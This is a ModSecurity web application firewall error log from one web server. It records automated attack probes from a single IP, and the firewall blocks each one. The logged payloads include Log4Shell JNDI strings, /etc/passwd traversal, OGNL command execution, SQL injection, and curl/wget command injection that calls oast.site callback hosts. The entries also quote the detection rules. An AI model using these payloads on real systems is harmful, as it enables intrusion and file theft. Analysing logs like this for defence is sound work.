[Tue Aug 29 11:30:51.384627 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg97zruu1sooeye.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOKNrgAAAAK"]
[Tue Aug 29 11:30:52.362298 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAO879kAAAAF"]
[Tue Aug 29 11:30:52.396342 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPMmDsAAAAY"]
[Tue Aug 29 11:30:53.363813 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPMmD4AAAAY"]
[Tue Aug 29 11:30:54.488037 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn2IAAAAP"]
[Tue Aug 29 11:30:54.495726 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOKNsUAAAAK"]
[Tue Aug 29 11:30:55.307451 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOKNsgAAAAK"]
[Tue Aug 29 11:30:55.423862 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPMmE0AAAAY"]
[Tue Aug 29 11:30:56.349702 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAOM4bQAAAAU"]
[Tue Aug 29 11:30:56.352715 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPDn2kAAAAP"]
[Tue Aug 29 11:30:56.403230 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAO87@4AAAAF"]
[Tue Aug 29 11:30:58.303562 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPRNeUAAAAf"]
[Tue Aug 29 11:30:59.311447 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg8s7xmzyu7kghw.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPPS0QAAAAd"]
[Tue Aug 29 11:30:59.312505 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10g8Co-f0AAAPDn3cAAAAP"]
[Tue Aug 29 11:30:59.465574 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOM4cIAAAAU"]
[Tue Aug 29 11:31:01.465549 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05I0AAAAA"]
[Tue Aug 29 11:31:03.869080 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg945fimouq1jt1.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9UAAAAI"]
[Tue Aug 29 11:31:04.709815 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg5exqrtdae6xh4.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg5exqrtdae6xh4.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQDFQoAAAAl"]
[Tue Aug 29 11:31:04.748965 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgcftjnu7qk3969.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP9HfcAAAAW"]
[Tue Aug 29 11:31:05.021437 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQBUFsAAAAj"]
[Tue Aug 29 11:31:05.736405 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "repositoryfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAP@MwIAAAAZ"]
[Tue Aug 29 11:31:06.330662 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQDFRQAAAAl"]
[Tue Aug 29 11:31:06.391119 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQLC@oAAAAt"]
[Tue Aug 29 11:31:07.374871 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgnj6uzoq1h97wh.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP9HgcAAAAW"]
[Tue Aug 29 11:31:08.311560 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQQyisAAAAy"]
[Tue Aug 29 11:31:09.096194 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgacssko9x3dd1b.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP05JUAAAAA"]
[Tue Aug 29 11:31:10.325156 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgrbkka93jwfkwz.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPDn4QAAAAP"]
[Tue Aug 29 11:31:10.335549 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQCvzkAAAAk"]
[Tue Aug 29 11:31:10.390597 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAOM4dAAAAAU"]
[Tue Aug 29 11:31:11.320890 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQFcQEAAAAn"]
